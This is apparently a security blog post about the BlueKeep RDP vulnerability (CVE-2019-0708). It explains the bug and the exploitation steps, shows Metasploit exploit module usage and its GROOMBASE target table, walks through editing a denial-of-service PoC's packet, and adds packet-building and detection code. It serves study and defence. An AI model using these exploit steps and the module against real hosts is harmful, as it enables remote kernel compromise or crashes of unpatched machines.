BlueKeep, the 2019 EternalBlue

We had a discussion about what the most critical vulnerability of 2019 was. After a heated debate we asked some friends and managed to cherry-pick one. The chosen one is BlueKeep.

Summary:

BlueKeep is one of the most notorious software security vulnerabilities of 2019. It was discovered by the United Kingdom's National Cyber Security Centre and publicly announced by Microsoft in May 2019 as a critical, pre-authentication vulnerability in Remote Desktop Services (RDP).

Microsoft considered the vulnerability so serious that it released patches for the out-of-support systems Windows XP and Windows Server 2003.

Affecting:

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows Vista

Windows Server 2003

Windows XP

on systems that have Remote Desktop Services (RDP) enabled. Windows 8 and later, and Windows Server 2012 and later, are not affected.

The vulnerability was assigned CVE-2019-0708.

Explanation of the vulnerability

CVE-2019-0708 is a use-after-free in termdd.sys, the kernel-mode driver that handles RDP virtual channels, and it is reachable before authentication. The server creates an internal virtual channel named MS_T120 for every connection; when a client also lists MS_T120 among the channels it requests, the same channel object is bound under a second channel ID, and closing that channel frees the object while the server's internal reference still points at it. The Metasploit module turns this into code execution roughly as follows:

Create an RDP connection that requests the MS_T120 virtual channel.

Start a heap spray of the kernel non-paged pool with controlled data.

Invoke allocations via ExAllocatePoolWithTag in IcaChannelInputInternal so that the freed memory is reoccupied by attacker-controlled data.

Trigger the use-after-free so that the stale object is dereferenced and the instruction pointer (EIP on 32-bit Windows, RIP on x64) is brought under control.

Execute ring 0 (kernel-mode) shellcode.
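The first step above, a client that asks for the MS_T120 channel, is also the most useful thing to look for on the wire. The following is an added example (it is not part of the page's PoC nor of the Metasploit module): it builds the TS_UD_CS_NET block that carries a client's channel list, laid out as in MS-RDPBCGR 2.2.1.3.4, and a small detector that walks the GCC user data blocks from a Client MCS Connect Initial and flags any channel named MS_T120. It assumes the caller has already extracted the user data byte string from the Connect Initial; the placeholder 0xC001 block and the channel names in the sample are constructed for the example, and comparing the name case-insensitively is a conservative choice of mine, not something the page states.

```python
import struct

# TS_UD_HEADER block types from MS-RDPBCGR 2.2.1.3.1; CS_NET carries the channel list.
CS_CORE = 0xC001
CS_NET = 0xC003
CHANNEL_NAME_LEN = 8               # CHANNEL_DEF.name: up to 7 ANSI chars + NUL, NUL padded
CHANNEL_DEF_LEN = 12               # name (8) + options (4)
CHANNEL_OPTION_INITIALIZED = 0x80000000
SUSPICIOUS_CHANNEL = b"MS_T120"    # internal channel a legitimate client never needs to request


def ud_block(btype, payload):
    """Prefix a payload with a TS_UD_HEADER: type (u16 LE) and total block length (u16 LE)."""
    return struct.pack("<HH", btype, 4 + len(payload)) + payload


def build_cs_net(channel_names):
    """Build a TS_UD_CS_NET block: header | channelCount (u32) | channelCount x CHANNEL_DEF."""
    defs = b""
    for name in channel_names:
        raw = name.encode("ascii")
        if len(raw) > CHANNEL_NAME_LEN - 1:
            raise ValueError("channel name too long: %r" % name)
        defs += raw.ljust(CHANNEL_NAME_LEN, b"\x00")
        defs += struct.pack("<I", CHANNEL_OPTION_INITIALIZED)
    return ud_block(CS_NET, struct.pack("<I", len(channel_names)) + defs)


def iter_user_data_blocks(blob):
    """Yield (type, payload) for every TS_UD_HEADER-prefixed block in client user data."""
    off = 0
    while off + 4 <= len(blob):
        btype, blen = struct.unpack_from("<HH", blob, off)
        if blen < 4 or off + blen > len(blob):
            raise ValueError("malformed user data block at offset %d" % off)
        yield btype, blob[off + 4:off + blen]
        off += blen


def requested_channels(blob):
    """Return the static virtual channel names the client asked for, as bytes without padding."""
    names = []
    for btype, payload in iter_user_data_blocks(blob):
        if btype != CS_NET:
            continue
        if len(payload) < 4:
            raise ValueError("CS_NET block too short for channelCount")
        (count,) = struct.unpack_from("<I", payload, 0)
        if 4 + count * CHANNEL_DEF_LEN > len(payload):
            raise ValueError("channelCount %d exceeds CS_NET block length" % count)
        for i in range(count):
            start = 4 + i * CHANNEL_DEF_LEN
            raw = payload[start:start + CHANNEL_NAME_LEN]
            names.append(raw.split(b"\x00", 1)[0])
    return names


def requests_ms_t120(blob):
    """True if the client asked for MS_T120 (case-insensitive comparison, a conservative choice)."""
    return any(name.upper() == SUSPICIOUS_CHANNEL for name in requested_channels(blob))


if __name__ == "__main__":
    # Constructed sample: a placeholder core block followed by the channel list.
    core = ud_block(CS_CORE, b"\x00" * 4)   # stand-in only, not a real TS_UD_CS_CORE
    benign = core + build_cs_net(["cliprdr", "rdpsnd"])
    hostile = core + build_cs_net(["cliprdr", "MS_T120", "rdpsnd"])
    print("benign :", requested_channels(benign), requests_ms_t120(benign))
    print("hostile:", requested_channels(hostile), requests_ms_t120(hostile))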



Proof of concept

Rapid7 has merged an initial BlueKeep exploit module into Metasploit. This is an important milestone for the framework, as BlueKeep is its first Windows RDP exploit. The module can be fetched directly from the repository and tried with msfconsole:

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# pwd
/usr/share/metasploit-framework/modules/exploits/windows/rdp
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...

       =[ metasploit v5.0.46-dev                          ]
+ -- --=[ 1922 exploits - 1074 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

msf5 > search bluekeep

Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting

root@kali:~# cat -n /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
   106          # Windows 2008 R2 requires the following registry change from default:
   107          #
   108          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
   109          # "fDisableCam"=dword:00000000
   110          #
   111          [
   112            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
   113            {
   114              'Platform' => 'win',
   115              'Arch' => [ARCH_X64],
   116              'GROOMBASE' => 0xfffffa8003800000
   117            }
   118          ],
   119          [
   120            # This works with Virtualbox 6
   121            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
   122            {
   123              'Platform' => 'win',
   124              'Arch' => [ARCH_X64],
   125              'GROOMBASE' => 0xfffffa8002407000
   126            }
   127          ],
   128          [
   129            # This address works on VMWare 15 on Windows.
   130            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
   131            {
   132              'Platform' => 'win',
   133              'Arch' => [ARCH_X64],
   134              'GROOMBASE' => 0xfffffa8018C00000
   135              #'GROOMBASE' => 0xfffffa801C000000
   136            }
   137          ],
   138          [
   139            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
   140            {
   141              'Platform' => 'win',
   142              'Arch' => [ARCH_X64],
   143              'GROOMBASE' => 0xfffffa8102407000
   144            }
   145          ],
   146        ],

The community is working on adding GROOMBASE values (the non-paged pool base address the heap groom relies on) for more Windows builds and hypervisors. As the target list above shows, the address differs between VirtualBox, VMware, Hyper-V and physical hardware, and a wrong value typically crashes the target with a blue screen instead of returning a shell, which is why the module is ranked manual and why the target must be chosen deliberately rather than left to fingerprinting.

Pentest-tools.com has written a guide on how to get the exploit working.

Blue screen of death PoC

A proof of concept published at github.com/Ekultek/BlueKeep crashes the kernel of a vulnerable host when run against it, producing a blue screen of death (a denial of service rather than code execution).



Log files

When the PoC script runs it sends the Client Info PDU, the packet that carries the login information (username, password, client address and client directory), built in client_info_pdu():

https://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py#L119

def client_info_pdu():
    # Client Info PDU, TPKT framed. All strings are UTF-16LE, i.e. every character is followed by a 00 byte.
    packet = (
        "0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"  # header, cbUserName = 0x000e, username "BrwAffy"
        "000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043"  # tttt10.0.0.76@C (password "tttt", client address, cbClientDir = 0x40)
        "003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078"  # :\WINDOWS\x00system32\mstscax
        "002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054"  # .dll a Mountain Standard T (time zone block begins)
        "0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"  # ime, standard date, Mou
        "006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"  # ntain Daylight Time
        "0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000"  # daylight date and bias, session id, performance flags
    )
    # the hex string is decoded into the raw bytes that go on the wire
    return bytes.fromhex(packet)

The username is defined in the first line: 42727741666679 is BrwAffy. This can be changed; as a PoC of this we changed it to firo. firo in hexadecimal is 6669726F, and then we need to fill out the buffer, so we add some zeros and end up with the result 6600690072006F000D000A0000. The new first line would then look like:

0300016102f08064000703eb7081524000a1a509040904bb47030000000e0008000000000000006600690072006F000D000A0000
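To show what the hex above encodes, here is an added example of my own (it is not the PoC's code) that builds a Client Info PDU from named fields following MS-RDPBCGR 2.2.1.11, parses one back with length checks at every layer, and rewrites the username while re-deriving every length field: cbUserName, the MCS user data length (0x8152 in the PoC) and the TPKT length (0x0161 in the PoC) all change when the UTF-16LE length of the name changes, which is what allows a name of any length to be used. The sample field values (BrwAffy, tttt, 10.0.0.76, C:\WINDOWS\system32\mstscax.dll) and the codePage and flags values are the ones in the PoC's packet; the builder zero-fills the 172-byte time-zone block and does not pad clientAddress to 28 bytes the way the PoC does, so its output is not byte-identical to the PoC's.

```python
import struct

SEC_INFO_PKT = 0x0040              # security header flag: payload is a Client Info PDU
INFO_UNICODE = 0x00000010          # TS_INFO_PACKET.flags bit: strings are UTF-16LE
MCS_SEND_DATA_REQUEST = 0x64
GLOBAL_CHANNEL = 1003              # MCS I/O channel the Client Info PDU is sent on
TIMEZONE_LEN = 172                 # TS_TIME_ZONE_INFORMATION is fixed size
X224_DATA = b"\x02\xf0\x80"
POC_CODE_PAGE = 0x04090409         # codePage and flags as they appear in the PoC packet
POC_FLAGS = 0x000347bb


def utf16z(s):
    """UTF-16LE plus the two-byte NUL terminator every RDP string carries on the wire."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_info_packet(username, password, domain="", client_address="", client_dir="",
                      code_page=POC_CODE_PAGE, flags=POC_FLAGS):
    """Serialize TS_INFO_PACKET + TS_EXTENDED_INFO_PACKET.

    cbDomain..cbWorkingDir count the UTF-16LE bytes WITHOUT the terminator (BrwAffy -> 14),
    while cbClientAddress and cbClientDir INCLUDE it (the mstscax.dll path -> 64).
    """
    if not flags & INFO_UNICODE:
        raise ValueError("INFO_UNICODE must be set for UTF-16LE strings")
    d, u, p = (s.encode("utf-16-le") for s in (domain, username, password))
    pkt = struct.pack("<IIHHHHH", code_page, flags, len(d), len(u), len(p), 0, 0)
    pkt += utf16z(domain) + utf16z(username) + utf16z(password) + utf16z("") + utf16z("")
    addr, cdir = utf16z(client_address), utf16z(client_dir)
    pkt += struct.pack("<HH", 0x0002, len(addr)) + addr            # AF_INET, cbClientAddress
    pkt += struct.pack("<H", len(cdir)) + cdir                     # cbClientDir
    pkt += b"\x00" * TIMEZONE_LEN                                  # time zone block, zero-filled here
    pkt += struct.pack("<IIHHH", 0, 0, 0, 0, 0)   # sessionId, perfFlags, cbAutoReconnectCookie, reserved1/2
    return pkt


def wrap_client_info(info_packet, initiator=7, channel=GLOBAL_CHANNEL):
    """Frame as TPKT | X.224 data | MCS SendDataRequest | security header | info packet.

    initiator is the PER-encoded MCS user id (userId - 1001); 7 is what the PoC sends.
    """
    user_data = struct.pack("<HH", SEC_INFO_PKT, 0) + info_packet
    if len(user_data) >= 0x4000:
        raise ValueError("user data too long for a two-byte PER length")
    mcs = struct.pack(">BHHBH", MCS_SEND_DATA_REQUEST, initiator, channel, 0x70,
                      0x8000 | len(user_data))                     # two-byte PER length, high bit set
    body = X224_DATA + mcs + user_data
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body         # TPKT: version 3, total length


def _cstring(pdu, off, cb):
    return pdu[off:off + cb].decode("utf-16-le").rstrip("\x00")


def parse_client_info(pdu):
    """Walk the framing back to the info packet, validating each length on the way."""
    if pdu[:2] != b"\x03\x00" or struct.unpack_from(">H", pdu, 2)[0] != len(pdu):
        raise ValueError("bad TPKT header or length")
    off = 4 + len(X224_DATA)
    if pdu[off] != MCS_SEND_DATA_REQUEST:
        raise ValueError("not an MCS SendDataRequest")
    off += 6                                                       # opcode, initiator, channel, priority
    length = pdu[off]
    if length & 0x80:
        length = struct.unpack_from(">H", pdu, off)[0] & 0x3FFF
        off += 2
    else:
        off += 1
    if off + length != len(pdu):
        raise ValueError("MCS user data length does not match frame")
    if not struct.unpack_from("<H", pdu, off)[0] & SEC_INFO_PKT:
        raise ValueError("security header lacks SEC_INFO_PKT")
    off += 4
    code_page, flags, cb_dom, cb_user, cb_pass, cb_shell, cb_wd = struct.unpack_from("<IIHHHHH", pdu, off)
    off += 18
    fields = {"code_page": code_page, "flags": flags}
    for name, cb in (("domain", cb_dom), ("username", cb_user), ("password", cb_pass),
                     ("alternate_shell", cb_shell), ("working_dir", cb_wd)):
        fields[name] = _cstring(pdu, off, cb)
        off += cb + 2                                              # skip the terminator cb does not count
    _family, cb_addr = struct.unpack_from("<HH", pdu, off)
    off += 4
    fields["client_address"] = _cstring(pdu, off, cb_addr)
    off += cb_addr
    (cb_dir,) = struct.unpack_from("<H", pdu, off)
    fields["client_dir"] = _cstring(pdu, off + 2, cb_dir)
    return fields


def set_username(pdu, new_name):
    """Rewrite the username by rebuilding, so every cb and framing length is re-derived."""
    f = parse_client_info(pdu)
    info = build_info_packet(new_name, f["password"], f["domain"], f["client_address"],
                             f["client_dir"], f["code_page"], f["flags"])
    return wrap_client_info(info)


if __name__ == "__main__":
    pdu = wrap_client_info(build_info_packet("BrwAffy", "tttt", client_address="10.0.0.76",
                                             client_dir=r"C:\WINDOWS\system32\mstscax.dll"))
    print(pdu[:4].hex(), parse_client_info(pdu)["username"])
    patched = set_username(pdu, "firo")
    print(patched[:4].hex(), parse_client_info(patched)["username"])
```

Feeding the parser a frame whose TPKT or MCS length disagrees with its actual size raises ValueError, which is the check a server-side decoder (or a detector working from a capture) should perform before trusting any of the cb fields.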

Scammers profiting off the vulnerability

Several sites claim to have a working PoC for this vulnerability for sale, for example:

rdpexploit[.]com

cve-2019-0708[.]info

buyexploit[.]com

Vulnerable hosts

Robert David Graham of Errata Security has released a scanner (rdpscan) for detecting this vulnerability and has published a blog post reporting that almost one million internet-facing hosts are vulnerable. Read it here

External links:

EternalBlue

Microsoft CVE-2019-0708 Advisory

National Cyber Security Centre vulnerability announcement

Zero Day Initiative's write-up

Packet Storm Security CVE-2019-0708

Sophos BlueKeep PoC

CVE-2019-0708 vulmon

Algo7 PoC

Windows protection rings

Metasploit pull request #12283 for BlueKeep

Metasploit announces the release of BlueKeep


This blog post is part of the exploit of the day series, where we write a short description of interesting exploits that we index.